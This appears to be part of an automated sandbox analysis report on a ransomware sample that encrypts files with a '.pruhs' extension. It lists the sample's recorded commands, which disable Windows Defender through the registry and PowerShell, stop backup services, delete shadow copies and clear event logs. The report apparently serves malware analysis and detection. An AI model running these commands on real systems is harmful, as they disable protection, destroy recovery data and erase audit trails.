| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_e4oJWUexRvI0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Go6WgLDhXWQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_YbU6FIgJDYQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_wO-aJxziRF40.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\es.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_0FPCyxax_WU0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_T-xEsP_e4bc0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ypk6w6mIS6A0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_VJqbfBphG_E0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\PREVIEW.GIF.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_HXcAW1WZiMs0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_JoK5A66GBzc0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ko-KR\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_y4EJt4qr44I0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_XRpuTVkiato0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_k7PZdeQ--VU0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Zi6BcsKTk3A0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_HoNihofGX3c0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_9UPbXtGxybA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-phn.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_RlDjZpa5JP40.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Erp_za8zDF80.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_v36NTEEFSS80.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_TDjqkQ-7mZA0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_zvIbj6ipyFU0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_12e21" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12e21" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_12e21" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.20:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
memory/908-115-0x0000000000000000-mapping.dmp
memory/980-116-0x0000000000000000-mapping.dmp
memory/2292-117-0x0000000000000000-mapping.dmp
memory/540-118-0x0000000000000000-mapping.dmp
memory/684-119-0x0000000000000000-mapping.dmp
memory/3184-120-0x0000000000000000-mapping.dmp
memory/3680-121-0x0000000000000000-mapping.dmp
memory/3576-122-0x0000000000000000-mapping.dmp
memory/3636-123-0x0000000000000000-mapping.dmp
memory/2924-124-0x0000000000000000-mapping.dmp
memory/2764-125-0x0000000000000000-mapping.dmp
memory/1408-126-0x0000000000000000-mapping.dmp
memory/2596-127-0x0000000000000000-mapping.dmp
memory/1256-128-0x0000000000000000-mapping.dmp
memory/3548-129-0x0000000000000000-mapping.dmp
memory/2220-130-0x0000000000000000-mapping.dmp
memory/716-131-0x0000000000000000-mapping.dmp
memory/1440-132-0x0000000000000000-mapping.dmp
memory/988-133-0x0000000000000000-mapping.dmp
memory/1296-134-0x0000000000000000-mapping.dmp
memory/1476-135-0x0000000000000000-mapping.dmp
memory/1732-136-0x0000000000000000-mapping.dmp
memory/4076-137-0x0000000000000000-mapping.dmp
memory/2056-138-0x0000000000000000-mapping.dmp
memory/2508-139-0x0000000000000000-mapping.dmp
memory/2864-140-0x0000000000000000-mapping.dmp
memory/3392-141-0x0000000000000000-mapping.dmp
memory/1380-142-0x0000000000000000-mapping.dmp
memory/2460-143-0x0000000000000000-mapping.dmp
memory/3248-144-0x0000000000000000-mapping.dmp
memory/1504-145-0x0000000000000000-mapping.dmp
memory/2372-146-0x0000000000000000-mapping.dmp
memory/1456-147-0x0000000000000000-mapping.dmp
memory/3168-148-0x0000000000000000-mapping.dmp
memory/928-149-0x0000000000000000-mapping.dmp
memory/1104-150-0x0000000000000000-mapping.dmp
memory/540-151-0x0000000000000000-mapping.dmp
memory/4036-152-0x0000000000000000-mapping.dmp
memory/3708-153-0x0000000000000000-mapping.dmp
memory/3912-154-0x0000000000000000-mapping.dmp
memory/3456-155-0x0000000000000000-mapping.dmp
memory/612-156-0x0000000000000000-mapping.dmp
memory/1068-157-0x0000000000000000-mapping.dmp
memory/516-158-0x0000000000000000-mapping.dmp
memory/1244-159-0x0000000000000000-mapping.dmp
memory/1488-160-0x0000000000000000-mapping.dmp
memory/2428-161-0x0000000000000000-mapping.dmp
memory/2516-162-0x0000000000000000-mapping.dmp
memory/1680-163-0x0000000000000000-mapping.dmp
memory/1808-164-0x0000000000000000-mapping.dmp
memory/2296-165-0x0000000000000000-mapping.dmp
memory/3088-166-0x0000000000000000-mapping.dmp
memory/3252-167-0x0000000000000000-mapping.dmp
memory/1384-168-0x0000000000000000-mapping.dmp
memory/2148-169-0x0000000000000000-mapping.dmp
memory/3836-170-0x0000000000000000-mapping.dmp
memory/2216-171-0x0000000000000000-mapping.dmp
memory/3820-172-0x0000000000000000-mapping.dmp
memory/388-173-0x0000000000000000-mapping.dmp
memory/980-174-0x0000000000000000-mapping.dmp
memory/3500-175-0x0000000000000000-mapping.dmp
memory/2716-176-0x0000000000000000-mapping.dmp
memory/3164-177-0x0000000000000000-mapping.dmp
memory/1616-178-0x0000000000000000-mapping.dmp
memory/3564-180-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
memory/3564-179-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
memory/3564-181-0x0000000004850000-0x0000000004886000-memory.dmp
memory/3564-182-0x00000000074F0000-0x0000000007B18000-memory.dmp
memory/3564-183-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
memory/3564-184-0x0000000006EB2000-0x0000000006EB3000-memory.dmp
memory/3564-185-0x00000000071C0000-0x00000000071E2000-memory.dmp
memory/3564-186-0x0000000007360000-0x00000000073C6000-memory.dmp
memory/3564-187-0x00000000073D0000-0x0000000007436000-memory.dmp
memory/3564-188-0x0000000007D00000-0x0000000008050000-memory.dmp
memory/3564-189-0x00000000074B0000-0x00000000074CC000-memory.dmp
memory/3564-190-0x00000000080D0000-0x000000000811B000-memory.dmp
memory/3564-191-0x00000000083A0000-0x0000000008416000-memory.dmp
memory/3564-192-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
memory/3564-200-0x00000000074F0000-0x0000000007B18000-memory.dmp
memory/3564-201-0x0000000009410000-0x0000000009443000-memory.dmp
memory/3564-202-0x0000000009410000-0x0000000009443000-memory.dmp
memory/3564-203-0x00000000071C0000-0x00000000071E2000-memory.dmp
memory/3564-204-0x0000000007360000-0x00000000073C6000-memory.dmp
memory/3564-205-0x00000000073D0000-0x0000000007436000-memory.dmp
memory/3564-206-0x00000000080D0000-0x000000000811B000-memory.dmp
memory/3564-207-0x00000000083A0000-0x0000000008416000-memory.dmp
memory/3564-208-0x00000000091F0000-0x000000000920E000-memory.dmp
memory/3564-213-0x0000000009550000-0x00000000095F5000-memory.dmp
memory/3564-214-0x000000007E0C0000-0x000000007E0C1000-memory.dmp
memory/3564-215-0x0000000009770000-0x0000000009804000-memory.dmp
memory/3564-282-0x0000000006EB3000-0x0000000006EB4000-memory.dmp
memory/3564-409-0x00000000096D0000-0x00000000096EA000-memory.dmp
memory/3564-414-0x00000000096D0000-0x00000000096EA000-memory.dmp
memory/3564-415-0x00000000084D0000-0x00000000084D8000-memory.dmp
